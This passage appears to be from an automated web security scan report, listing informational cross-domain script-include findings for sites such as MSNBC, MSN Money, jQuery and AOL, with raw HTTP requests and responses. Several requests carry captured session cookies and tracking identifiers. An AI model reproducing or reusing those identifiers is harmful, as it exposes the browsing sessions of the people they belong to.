</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.125. http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ingame.msnbc.msn.com
Path:   /_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy?chromedomain=technolog HTTP/1.1
Host: ingame.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:08:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109171


<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>In-Game - 'My Virtual G
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a13fb07a18e3230078b48aadd2b832aa48d9f59f.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/8279c89e6cbfbec39495cd10332ce1234f0aa2d8.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/ingame/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.126. http://insidemsn.wordpress.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://insidemsn.wordpress.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: insidemsn.wordpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 29 Jan 2011 23:47:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Last-Modified: Sat, 29 Jan 2011 23:43:32 +0000
Cache-Control: max-age=86, must-revalidate
Vary: Cookie
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://insidemsn.wordpress.com/xmlrpc.php
Link: <http://wp.me/16dqb>; rel=shortlink
X-nananana: Batcache
Content-Length: 28282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<!--
   generate
...[SNIP]...
<link rel="stylesheet" href="http://s0.wp.com/wp-content/themes/h4/global.css?m=1296073727g" type="text/css" />
<script type='text/javascript' src='http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&amp;ver=20101110'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1290133841g&amp;ver=1.4.4'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?o&#038;ver=MU'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...

23.127. http://investing.money.redacted/investments/charts

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investing.money.redacted
Path:   /investments/charts

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /investments/charts HTTP/1.1
Host: investing.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:08:31 GMT
Content-Length: 49374
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir="ltr" lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...

23.128. http://investing.money.redacted/investments/currency-exchange-rates/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investing.money.redacted
Path:   /investments/currency-exchange-rates/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /investments/currency-exchange-rates/ HTTP/1.1
Host: investing.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:08:42 GMT
Content-Length: 35170
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir="ltr" lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...

23.129. http://investing.money.redacted/investments/market-index/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investing.money.redacted
Path:   /investments/market-index/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /investments/market-index/?symbol= HTTP/1.1
Host: investing.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:08:41 GMT
Content-Length: 35170
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir="ltr" lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...

23.130. http://investing.money.redacted/investments/market-summary

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investing.money.redacted
Path:   /investments/market-summary

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /investments/market-summary HTTP/1.1
Host: investing.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:08:31 GMT
Content-Length: 115102
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir="ltr" lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<div class="br br1 brl" >

<script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...

23.131. http://investing.money.redacted/investments/stock-price

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investing.money.redacted
Path:   /investments/stock-price

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /investments/stock-price?Symbol= HTTP/1.1
Host: investing.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:08:30 GMT
Content-Length: 35170
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir="ltr" lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...

23.132. http://investing.money.redacted/investments/stock-price/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investing.money.redacted
Path:   /investments/stock-price/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /investments/stock-price/?Symbol=US:EP HTTP/1.1
Host: investing.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:08:41 GMT
Content-Length: 79757
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir="ltr" lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<div class="br br1 brl" >

<script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...

23.133. http://javascript.nwbox.com/IEContentLoaded/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://javascript.nwbox.com
Path:   /IEContentLoaded/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /IEContentLoaded/ HTTP/1.1
Host: javascript.nwbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 09:01:58 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Sun, 01 Aug 2010 04:41:14 GMT
ETag: "4366-b1a50e80"
Accept-Ranges: bytes
Content-Length: 17254
Cache-Control: max-age=259200
Expires: Wed, 02 Feb 2011 09:01:58 GMT
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>IECo
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

23.134. http://jcfootball.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jcfootball.scout.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: jcfootball.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:09:07 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:19:07 GMT
Last-Modified: Sat, 29 Jan 2011 23:52:25 GMT
ETag: "1CBC00F93FC0280"
Content-Type: text/html
Content-Length: 41053

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>JC Football Recruiting Front Page</title>
<meta http
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.135. http://jquery.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:23:43 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 05 Jan 2011 23:10:28 GMT
ETag: "4960174-3eb0-7da86100"
Accept-Ranges: bytes
Content-Length: 16048
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=utf-8" />
       <title>jQuery: The Write Less, Do More, JavaScript Library</title>
       <link rel="stylesheet" hr
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/files/rocker/css/screen.css" type="text/css" />
       <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

23.136. http://jquery.org/license

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.org
Path:   /license

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /license HTTP/1.1
Host: jquery.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:08 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 30 Jan 2011 00:58:34 GMT
ETag: "79985e2-206a-cc71e280"
Accept-Ranges: bytes
Content-Length: 8298
Cache-Control: max-age=300, must-revalidate
Expires: Sun, 30 Jan 2011 02:14:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.jquery.com/org/style.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.137. http://jqueryui.com/about

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 23:41:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

23.138. http://latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://latino.aol.com
Path:   /$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: latino.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 02:09:09 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lma05.websys.aol.com
x-ua-compatible: IE=EmulateIE7
Content-Type: text/html;;charset=utf-8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 15581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="IE7"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://portal.aolcdn.com/skn/classic_v1/4-err.css" />
<script type="text/javascript" src="http://portal.aolcdn.com/p/v32/63-main.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...

23.139. http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifeinc.todayshow.com
Path:   /_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never?gt1=43001 HTTP/1.1
Host: lifeinc.todayshow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=184
Date: Sat, 29 Jan 2011 23:47:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137460

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Life Inc. - Good Graph Fr
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/e2a5a79d215988ddb0f116d757365d6a810c2d2e.css?v=23247" />
